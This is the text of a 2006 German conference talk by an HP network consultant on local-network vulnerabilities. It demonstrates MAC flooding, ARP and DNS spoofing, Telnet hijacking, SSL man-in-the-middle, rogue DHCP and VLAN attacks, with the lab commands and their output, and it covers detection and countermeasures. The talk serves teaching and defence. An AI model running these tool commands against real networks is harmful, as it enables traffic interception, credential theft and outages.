IT-Symposium 2006
1www.decus.de
18. Mai 2006
© 2004 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice
Schwachstellen in lokalen Netzwerken
3C04
Andreas AurandNetwork Consultant NWCC, HP
May 18, 2006 Andreas Aurand, HP Network Competence Center 2
Shared Ethernet• Bus-Topologie. Alle Maschinen sind an einem
gemeinsam genutzten Bus angeschlossen.• Die einzelnen physikalischen Kabel sind über Hubs
verbunden, • Leiten jedes empfangene Paket an alle verfügbaren Ports weiter• Jedes System kann den gesamten Datenverkehr sehen
• Shared Ethernet bietet keine Sicherheit
Zielsystem00-00-F8-31-A4-2D
SenderAngreifer
Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.
Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben.
Paket zum Zielsystem 08-00-2B-01-02-03
Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.
IT-Symposium 2006
2www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 3
Switched Ethernet• Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports
weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. • Diese Information ist in MAC-Adresstabelle gespeichert• Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben
• Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Paketeüber alle Ports fluten. • Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk• Switch verhält sich wie ein Hub• Pakete sind für Angreifer sichtbar
Zielsystem00-00-F8-31-A4-2D
Sender08-00-2B-05-67-87
Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.
Paket zum Zielsystem 00-00-F8-31-A4-2D
Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.
Port 2/17
Port Fa0/24
May 18, 2006 Andreas Aurand, HP Network Competence Center 4
Switched Ethernet• Aufbau der MAC-Adresstabelle
• MAC-Adresse ist in der Tabelle vorhanden
Sender00-00-F8-31-A4-2D
Zielsystem08-00-2B-05-67-87
Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.
Port 2/17
Port Fa0/24
Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.
Zielsystem00-00-F8-31-A4-2D
Sender08-00-2B-05-67-87
Paket zum Zielsystem 00-00-F8-31-A4-2D
Port 2/17
Port Fa0/24
Switch filtert Paket.
Switch filtert Paket.
# show mac-address-table address 0000.F831.A42DNon-static Address Table:Destination Address Address Type VLAN Destination Port------------------- ------------ ---- ----------------0000.f831.a42d Dynamic 1 FastEthernet0/24
IT-Symposium 2006
3www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 5
Sniffing
May 18, 2006 Andreas Aurand, HP Network Competence Center 6
Sniffing• Angreifer versucht, in Besitz von sensitiven Daten zu gelangen
• Passwörter, vertrauliche Daten usw.• Schnittstelle ist im Promiscuous Mode
Default GatewayIP: 10.185.208.190 / 21
MAC: 00-00-0C-07-AC-7B
Angreifer (Host attack)
IP: 10.185.208.189 / 21MAC: 00-60-97-80-9D-D6
IT-Symposium 2006
4www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 7
Promiscuous Mode Scanner• Erkennen Schnittstellen, die im Promiscuous Mode laufen
• z.B. proDETECT, Promiscan, anti_sniff oder Cain
May 18, 2006 Andreas Aurand, HP Network Competence Center 8
Cain - MAC Scanner• Host 192.168.28.198 nicht im Promiscuous Mode
• http://www.blackhat.com/html/bh-usa-01/bh-usa-01-speakers.html#Daiji%20Sanai
IT-Symposium 2006
5www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 9
Cain - MAC Scanner• Host 192.168.28.198 im Promiscuous Mode
May 18, 2006 Andreas Aurand, HP Network Competence Center 10
MAC-Angriffe
IT-Symposium 2006
6www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 11
MAC Flooding• Angreifer versucht die MAC-Adresstabelle aufzufüllen
• Tools: macof oder pktgen
Angreifer"attack"
Pakete mit unterschiedlichen MAC-QuelladressenPakete mit unterschiedlichen MAC-Quelladressen
2/17
Rechner C
Rechner ACat2924CCat5000
Paket für Rechner CPaket für Rechner C Paket für R
echner CP
aket für Rechner C
Paket für R
echner CP
aket für Rechner C
Rechner B
Paket für Rechner CPaket für Rechner C2/18
Fa0/241/2
linny:~ # macof -i eth1 -n 150000macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3
cat5000> (enable) show cam count dynTotal Matching CAM Entries = 130904
May 18, 2006 Andreas Aurand, HP Network Competence Center 12
MAC Flooding• Überlauf der Forwarding-Tabelle über SNMP auslesen
• .iso.org.dod.internet.mgmt.mib-2.dot1dBridge.dot1dTp.dot1dTpLearnedEntryDiscards
# macof -i eth1 -n 100000 >/dev/null 2>&1 &# snmpget -c public 10.185.208.1 mib-2.17.4.1.0 (mib-2 = 1.3.6.1.2.1)SNMPv2-SMI::mib-2.17.4.1.0 = Counter32: 4427
IT-Symposium 2006
7www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 13
MAC Spoofing• Angreifer verwendet MAC-Adresse eines bekannten Systems
• Angreifer kann Pakete nicht an das Zielsystem weiterleiten• DoS-Angriff oder Rogue Server
attack# macchanger --mac=00:10:7b:36:4e:80 eth0Current MAC: 00:60:97:80:9d:d6 (3com Corporation)Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.)
Default GatewayIP: 192.168.28.10
MAC: 00:10:7b:36:4e:80
Angreifer IP: 192.168.28.196
MAC: 00:60:97:80:9d:d6
Pakete mit Quelladresse: 00:60:97:80:9d:d6Pakete mit Quelladresse: 00:60:97:80:9d:d6
3/13
3/15
HTTP ServerIP: 10.185.208.185
MAC: 00-00-F8-71-2E-B3
3/13
3/15
http://10.185.208.185/http://10.185.208.185/
Angreifer IP: 10.185.208.189
MAC: 00:04:c1:7d:d6:54
Pakete mit Quelladresse: 00-00-F8-71-2E-B3Pakete mit Quelladresse: 00-00-F8-71-2E-B3
May 18, 2006 Andreas Aurand, HP Network Competence Center 14
ARP Spoofing
IT-Symposium 2006
8www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 15
Wie funktioniert der ARP Cache ?
Ja
Nein
Ja
Nein
Protokolltypunterstützt ?Protokolltypunterstützt ?
Merge_Flag := FalseMerge_Flag := False
Eintrag fürSenderpaar imARP Cache ?
Eintrag fürSenderpaar imARP Cache ?
Neuen Eintrag im ARP Cache anlegenNeuen Eintrag im
ARP Cache anlegen
IP-Adresse desZielsystems =lokale Adresse
IP-Adresse desZielsystems =lokale Adresse
Eintrag im ARP Cacheerneuern
und Merge_Flag := True
Eintrag im ARP Cacheerneuern
und Merge_Flag := True
Ja
Ja
Nein
Nein
1
2
Operation-Feld aufares_op$REPLY setzen
Operation-Feld aufares_op$REPLY setzen
Handelt es sich um einen
Request ?
Handelt es sich um einen
Request ?
Lokale HW- und Protokolladresse in die Senderfelder eintragen
Lokale HW- und Protokolladresse in die Senderfelder eintragen
Ja
Reply-Paket als Unicast an HW-Adresse des Zielsystems senden
Reply-Paket als Unicast an HW-Adresse des Zielsystems senden
Nein
Merge Flag = False ?
Merge Flag = False ?
Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als „Sender MAC Address“eingetragen ist.
May 18, 2006 Andreas Aurand, HP Network Competence Center 16
ARP Spoofing• Bestehende Einträge im ARP Cache durch „gefälschte“ ARP-
Pakete modifizieren und neue Einträge hinzufügen
• ARP Spoofing oder ARP Cache Poisoning
• Ermöglicht DoS- und MitM-Attacken
• Gratuitous ARP• ARP Reply Broadcast um einen bestehenden Eintrag auf
allen Systemen des LANs abzuändern• Häufig benutzt, um ARP-Eintrag des Default Gateway
auf allen Hosts eines Subnetzes zu modifizieren
IT-Symposium 2006
9www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 17
arpspoof
attack# arpspoof -i eth0 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ffAddress Resolution Protocol (reply)
… … …Opcode: reply (0x0002)Sender MAC address: 00:60:5c:f4:72:6fSender IP address: 192.168.28.254Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast)Target IP address: 0.0.0.0 (0.0.0.0)
attack# arpspoof -i eth0 -t 192.168.28.197 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3Address Resolution Protocol (reply)
… … …Opcode: reply (0x0002)Sender MAC address: 00:60:97:80:9d:d6Sender IP address: 192.168.28.254)Target MAC address: 00:00:f8:71:2e:b3 Target IP address: 192.168.28.197
# arp -a 192.168.28.254192.168.28.254 at 00:60:97:80:9D:D6
AngegriffeneRechner
IP: 192.168.28.197
Default GatewayIP: 192.168.28.254
MAC: 00-60-5c-f4-72-6f
Angreifer (Host attack)
IP: 192.168.28.196MAC: 00-60-97-80-9D-D6
Angriff über ARP Request oder ReplyAngriff über ARP Request oder Reply
Gratuitous ARP wird als Broadcast gesendet.
May 18, 2006 Andreas Aurand, HP Network Competence Center 18
Session Hijacking
IT-Symposium 2006
10www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 19
Session Hijacking
• Angreifer verwendet hunt, um eine bestehende Verbindung zu übernehmen.• hunt wiederum benutzt ARP Spoofing, um die Pakete umzuleiten
Angreifer
Client192.168.28.197
Router192.168.28.254
ARP Reply (IP: 192.168.28.197 MAC: EA:1A:DE:AD:BE:01)ARP Reply (IP: 192.168.28.254 MAC: EA:1A:DE:AD:BE:02)ARP Reply (IP: 192.168.28.197 MAC: EA:1A:DE:AD:BE:01)ARP Reply (IP: 192.168.28.254 MAC: EA:1A:DE:AD:BE:02)
Telnet Session zum Router wird vom Angreifer übernommen
May 18, 2006 Andreas Aurand, HP Network Competence Center 20
Session Hijacking mit hunt--- Main Menu --- rcvpkt 1148, free/alloc 63/64 ---Y---l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/maco) optionsx) exit*> l1) 192.168.28.208 [1253] --> 192.168.28.185 [23]2) 192.168.28.197 [49230] --> 192.168.28.254 [23]--- Main Menu --- rcvpkt 2528, free/alloc 63/64 ---Y---… … …a) arp/simple hijack (avoids ack storm if arp used)… … …-> a0) 192.168.28.208 [1253] --> 192.168.28.185 [23]1) 192.168.28.197 [49230] --> 192.168.28.254 [23] choose conn> 1hosts already ARP spoofedinput mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>dump connectin y/n [y]>dump [s]rc/[d]st/[b]oth [b]>print src/dst same characters y/n [n]>CTRL-C to breakeennaa
Password: crouter#
Angreifer bekommt die komplette Telnet-Verbindung zwischen dem Host und dem Router angezeigt.
IT-Symposium 2006
11www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 21
Session Hijacking mit hunt• Mit der Tastenkombination "CTRL C" übernimmt hunt die Telnet-Verbindung
-- press any key>you took over the connectionCTRL-] to breaknixat2# show user
Line User Host(s) Idle Location0 con 0 idle 2d00h
* 2 vty 0 idle 00:00:00 client.frs-lab.de
• Mit der Tastenkombination “CTRL ]“ gibt hunt die Session wieder freirouter#[r]eset connection/[s]ynchronize/[n]one [r]> suser have to type 16 chars and print 424 chars to synchronize connectionCTRL-C to break 1234567890123456done
• Synchronisation der Verbindung auf der Client-Seitemsg from root: power failure - try to type 16 chars 1234567890123456power failure detected... power resumed, ok
Zu diesem Zeitpunkt hat der Angreifer die Telnet-Verbindung übernommen
Damit die Sequenznummern der Telnet-Verbindung wieder synchronisiert sind, bekommt der Anwender auf dem Client eine Meldung, um die fehlenden Zeichen einzugeben.
May 18, 2006 Andreas Aurand, HP Network Competence Center 22
SSL Man-in-the-Middle Angriff
IT-Symposium 2006
12www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 23
Sicherheitslücke: MitM-Attacke• Diffie-Hellman und RSA-Verschlüsselung sind anfällig für MitM-Attacken• Authentizität der Partner muss überprüft werden
• bei SSL über Gültigkeit des Server-Zertifikats• bei SSH über Verifikation des Server Key
HTTPS Server
Angegriffener Rechner(Host mpdepp)
192.168.28.199 / 24
Angreifer (Host attack)
192.168.28.197 / 24
SSL Session zwischen dem Client und dem Angreifer.
SSL Session zwischen dem Angreifer und dem eigentlichen Server.
Default GatewayIP: 192.168.28.254 / 24
May 18, 2006 Andreas Aurand, HP Network Competence Center 24
SSL MitM-Attacke mit Ettercap• Verwendet ARP Spoofing um die Verbindung umzuleiten• Das verwendete Zertifikat ist fast identisch mit dem Original-Zertifikat
attack:/ # ettercap -T -i eth0 \--mitm arp:remote /192.168.28.254/80,443 /192.168.28.199/ … … …2 hosts added to the hosts list...ARP poisoning victims:GROUP 1 : 192.168.28.254 00:10:7B:3B:5C:A1GROUP 2 : 192.168.28.199 00:00:F8:70:7C:86
Starting Unified sniffing...… … …==================================================IP address : 10.38.89.169DISTANCE : 1TYPE : REMOTE hostFINGERPRINT :OPERATING SYSTEM : UNKNOWNPORT : TCP 443 | https [Apache/1.3.26 (OpenVMS) mod_ssl/2.8.10 OpenSSL/0.9.7d]
ACCOUNT : andreas / geheim (192.168.28.199)INFO : https://boerse.frs-lab.de/login.html
==================================================
Inline help:
[vV] - change the visualization mode[pP] - activate a plugin[lL] - print the hosts list[oO] - print the profiles list[cC] - print the connections list[sS] - print interfaces statistics[<space>] - stop/cont printing packets[qQ] - quit
IT-Symposium 2006
13www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 25
SSL MitM-Attacke mit Ettercap• Warnung beim Aufruf der Seite
• Unbekannte Zertifizierungsstelle
May 18, 2006 Andreas Aurand, HP Network Competence Center 26
SSL MitM-Attacke mit Ettercap• Ettercap verwendet fast identisches Zertifikat
• Fingerprint stimmt nicht • X.500-Name des Herausgeber ist modifiziert (Leeres L-Feld)
IT-Symposium 2006
14www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 27
SSL MitM-Attacke mit Ettercap• Vergleich mit dem Original-Zertifikat
May 18, 2006 Andreas Aurand, HP Network Competence Center 28
Schutz gegen Pharming und Phising• Petname Tool für Firefox
• http://petname.mozdev.org/• Using the petname tool, you can save a
reminder note about a relationship you have with a secure site.
• The petname tool will then automati-cally display this reminder note every time you visit the site.
• After following a hyperlink, you need only check that the expected reminder note is being displayed.
• If so, you can be sure you are using the same site you have in the past.
• Phishing mit gültigem Zertifikat• http://www.heise.de/security/news/meldung/
69598
IT-Symposium 2006
15www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 29
DNS Spoofing
May 18, 2006 Andreas Aurand, HP Network Competence Center 30
DNS Spoofing• Oft für Man-in-the-Middle-Attacken benutzt
• Verschlüsselte Verbindungen terminieren angreifendem Rechner• SSH• HTTPS
• Angreifer beantwortet DNS Query mit eigenem DNS Response• Reply-Adresse ist seine eigene IP-Adresse
• Angreifer muss DNS Queries empfangen können• ARP Spoofing
• MAC Flooding
IT-Symposium 2006
16www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 31
DNS SpoofingServer
(Host www.bank.de)10.185.208.186
Angegriffener RechnerIP: 10.205.210.127 / 21
MAC: AA-00-04-00-37-FD
Angreifer (Host attack)
IP: 10.205.208.189 / 21MAC: 00-60-97-80-9D-D6 DNS Response (Host: www.bank.de, IP: 10.185.208.186)DNS Response (Host: www.bank.de, IP: 10.185.208.186)
DNS Queries gehen immer zuerst zum Angreifer.
Session zwischen dem Angreifer und dem eigentlichen Server
DNS Query (Host: www.bank.de)DNS Query (Host: www.bank.de)
Die DNS Response des Angreifers enthält seine IP-Adresse.
Default GatewayIP: 10.205.208.1 / 21
MAC: 00-00-F8-71-2E-B3
DNS Server 10.34.93.242
May 18, 2006 Andreas Aurand, HP Network Competence Center 32
dnsspoof (dsniff-Tool)• Script für DNS Spoofing
attack# cat mitm## Enable Forwarding and disable sending ICMP Redirects#echo "1" > /proc/sys/net/ipv4/ip_forwardecho "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects## Enable ARP and DNS Spoofing#arpspoof -i eth0 10.205.208.1 2>/dev/null &dnsspoof -i eth0 -f dnsspoof.hosts host 10.205.210.127 2>/dev/null &
# cat dnsspoof.hosts10.205.208.189 www.bank.de
IP-Adresse des Default Gateway
IP-Adresse des angegriffenen Rechners
IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für www.bank.de zurückgesendet wird.
IT-Symposium 2006
17www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 33
DHCP-Angriffe
May 18, 2006 Andreas Aurand, HP Network Competence Center 34
DHCP Rogue Server• Angreifer setzt eigenen DHCP-Server ab um Clients mit
falschen Informationen zu versorgen. • Ermöglicht DoS- als auch MitM-Attacken• Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht
Default Gateway192.168.1.1 Angegriffener
DHCP Client
NormalerDHCP Server 192.168.1.2
DHCP Offer mit 192.168.1.185 als Default Gateway
DHCP Offer mit 192.168.1.185 als Default Gateway
Alle vom Client gesendeten Pakete gehen über den Angreifer.
Rückverkehr geht vom Default Gateway direkt zum Client.
AngreifenderRogue Server 192.168.1.185
IT-Symposium 2006
18www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 35
attack# ./Gobbler -m 1 -D 192.168.1.185 -G 192.168.1.185 -A 192.168.1.33DHCP gobbler v0.66 from www.networkpenetration.com--------------------------------------------------Man the middle attackTrying to gobble address to be used in man in the middle attackDHCP Discover packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP OFFER packetDHCP request packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP ACK packet192.168.1.113 gobbled.... Total: 1Address(es) to be spoofed 192.168.1.113Sniffing for discover messagesSniffing DHCP packets.....Got A DHCP discover packet..... a host is trying to find a valid IPTime to do the dirty workDHCP Offer packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....got a dhcp request packetTransaction compare passed...Request IP: 192.168.1.113Offerd IP: 192.168.1.113Sent + Requested IP's match.... sending ackCreating an Ack packetDHCP ACK packet constructed and injected, wrote all 342 bytesMan in the middle should be established m00 m4m4m4m4Just checking incase of other servers weren't happy (waiting for 10 seconds)
Sniffing DHCP packets.....
DHCP Gobbler
Rogue Server allokiert eine Adresse vom richtigen DHCP-Server.
Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück.
IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A)
May 18, 2006 Andreas Aurand, HP Network Competence Center 36
DHCP Starvation• Angreifer “spooft” den DHCP Packet Exchange
• Fordert alle verfügbaren IP-Adressen vom Servers an
• Server kann Clients keine Adresse mehr zuweisen• DoS-Attacke auf den DHCP-Server.
attack# DHCPGobbler -gDetecting DHCP service for gobble attackDHCP server at 1A92.168.1.190 offering 192.168.1.101 with subnet mask 255.255.255.0 gateway 192.168.1.1 and DNS 10.185.208.34192.168.1.101 gobbled using MAC 0:28:c:a8:5e:a7192.168.1.102 gobbled using MAC 0:a8:25:24:5e:51192.168.1.103 gobbled using MAC 0:48:c4:b3:a9:a0192.168.1.104 gobbled using MAC 0:3c:63:ab:41:f3192.168.1.105 gobbled using MAC 0:73:92:a7:75:1b….
DHCP-Server192.168.1.190
Angreifer
Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten.
DHCP RequestDHCP Request
Vorgetäuschter DHCP-PaketaustauschVorgetäuschter DHCP-Paketaustausch DHCP Clients
Für jede Anforderung muss eine neue MAC-Adresse verwendet werden
IT-Symposium 2006
19www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 37
Spanning Tree und andere VLAN-Attacken
May 18, 2006 Andreas Aurand, HP Network Competence Center 38
STP-Attacken – DoS-Angriff• Angreifer sendet Bridge PDUs die dazu führen, dass die
Switches den Spanning Tree neu berechnen müssen• Durch Learning/Listening Phasen sind Teile des Netzes für
mindestens 30 Sekunden nicht erreichbar
Port: 1/1Port Cost: 100Designated Port 10.185.208.189
Port: 2/9Port Cost: 100
Forwarding Portgeht auf Blocking.
Fa0/35000Sup15000-Sup2
Port: 1/2Port Cost: 100
Root Port
Port: 1/2Port Cost: 100Root Port
Cat2924Port: Fa0/24Port Cost: 100Designated Port
Port: Fa0/22Port Cost: 100
Designated Port
AngreiferAngreifer STP Priorität 0Cat5000-Sup2 STP Priorität 8192Cat5000-Sup1 STP Priorität 16384Cat2924 STP Priorität 32768
B P D
UB
P D U
Switch setzt den geblockten Port zuerst für 30 Sekunden auf Listening/Learningbevor er auf Forwarding geht.
Port: Fa0/9Port Cost: 100Root Port
IT-Symposium 2006
20www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 39
STP-Attacken – MitM-Angriff• Der Angreifer benötigt in diesem Fall
Verbindungen zu verschiedenen Switches
Port: 1/1Designated Port
eth0 eth1
Port: 2/1Root Port
Port: Fa0/24
Port: Fa0/9Root Port
Port: 1/1Root Port
Port: 2/9Designated Port
Angreifer
Port: Fa0/22Designated Port
Port: 1/25000-Sup2
Forwarding Port geht auf Blocking
Cat29245000Sup1
10.185.208.190
10.185.208.175
B P D
UB
P D U
Angreifer Priorität 1Cat5000-Sup2 Priorität 8192Cat5000-Sup1 Priorität 16384Cat2924 Priorität 32768
May 18, 2006 Andreas Aurand, HP Network Competence Center 40
VLAN Hopping – Switch Spoofing• Standardmäßig stehen Switchports auf Trunk Mode „auto“
• Mit gefälschten DTP-Paketen (Dynamic Trunking Protocol) kann Angreifer Trunk-Verbindung (IEEE 802.1Q) zum Switch aufbauen• Zugriff auf alle VLANs möglich
Console> (enable) show trunk 3/3Port Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------3/3 auto negotiate not-trunking 1
DTP Modus „auto“
Verbindung wird durch DTP als Trunk konfiguriert und Angreifer erhält Zugang zu allen VLANs.
IT-Symposium 2006
21www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 41
VLAN Hopping – Double Tagging• Frame mit zwei IEEE 802.1Q VLAN Header
• Access Port und Native VLAN des Trunk müssen zum gleichen VLAN gehören
• Quell- und Zielmaschinen müssen an verschiedenen Switches angeschlossen sein
Native VLAN der Trunk-Verbindung muss VLAN 1 sein.
802.1 Q | Daten802.1 Q | Daten DatenDaten
VLAN 5
VLAN 1
802.1 Q | Daten802.1 Q | Daten
VLAN 1 VLAN 1
802.1 Q | 802.1Q
802.1 Q | 802.1Q
May 18, 2006 Andreas Aurand, HP Network Competence Center 42
VTP-Angriffe• Über VTP (VLAN Trunking Protocol) tauschen Catalyst
Switches Informationen über ihre VLAN-Konfiguration aus• Läuft nur über Trunk Ports
• Durch das Versenden von gefälschten VTP-Paketen kann ein Angreifer VLANs hinzufügen oder Löschen (DoS-Angriff)
VTP Domainfrslab
DTP- und VTP-PaketeDTP- und VTP-Pakete
10.185.208.2 Cat5000-SUP1> (enable) show logging buffer2003 Sep 01 14:05:38 %VTP-6-VLANCHG:VLAN 5 deleted2003 Sep 01 14:05:39 %VTP-6-VLANCHG:VLAN 95 deleted2003 Sep 01 14:05:40 %VTP-6-VLANCHG:VLAN 96 deleted2003 Sep 01 14:05:41 %VTP-6-VLANCHG:VLAN 97 deleted2003 Sep 01 14:05:42 %VTP-6-VLANCHG:VLAN 98 deleted2003 Sep 01 14:05:43 %VTP-6-VLANCHG:VLAN 999 deleted2003 Sep 01 14:05:43 %VTP-6-VLANCHG:VLAN 1003 modified
IT-Symposium 2006
22www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 43
Andere LAN-Attacken
• Spanning-Tree-Attacken• Schutz durch richtige Konfiguration der Switches
• Festlegen an welchen Ports andere Switches angeschlossen werden dürfen
• Festlegen über welche Ports die Root Bridge gesehen werden darf
• VLAN-Attacken• Schutz durch richtige Konfiguration der Switches
• Eigenes VLAN für Trunk-Verbindungen
• VLAN 1 nicht verwenden
May 18, 2006 Andreas Aurand, HP Network Competence Center 44
Yersinia• Ermöglicht die folgenden Layer-2-Attacken:
• Spanning Tree Protocol (STP)• Cisco Discovery Protocol (CDP)• Dynamic Trunking Protocol (DTP)• Dynamic Host Configuration Protocol (DHCP)• Hot Standby Router Protocol (HSRP)• IEEE 802.1Q • Inter-Switch Link Protocol (ISL)• VLAN Trunking Protocol (VTP)• www.yersinia.net
IT-Symposium 2006
23www.decus.de
18. Mai 2006
May 18, 2006 Andreas Aurand, HP Network Competence Center 45
Yersinia• Switchport auf Trunking setzen
cat5000-sup2> (enable) show trunk 2/2 detail* - indicates vtp domain mismatchPort Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------2/2 auto negotiate not-trunking 1
Port Peer-Port Mode Encapsulation Status-------- --------- ----------- ------------- ------------2/2 unknown unknown unknown unknown
2006 Apr 18 14:04:20 MET-DST +02:00 %DTP-5-TRUNKPORTON:Port 2/2 has become dot1q trunk
cat5000-sup2> (enable) show trunk 2/2 detail* - indicates vtp domain mismatchPort Mode Encapsulation Status Native vlan-------- ----------- ------------- ------------ -----------2/2 auto n-dot1q trunking 1
Port Peer-Port Mode Encapsulation Status-------- --------- ----------- ------------- ------------2/2 unknown desirable dot1q not-trunking
attack# yersinia dtp -i eth0 -attack 2 -smac 00:00:F8:71:2E:B3 -d mac 01:00:0C:CC:CC:CC \-domain frslab \-neighbor 00:00:F8:71:2E:B3
May 18, 2006 Andreas Aurand, HP Network Competence Center 46
Fragen ????????• http://www.dpunkt.de/buch/3-89864-297-6.html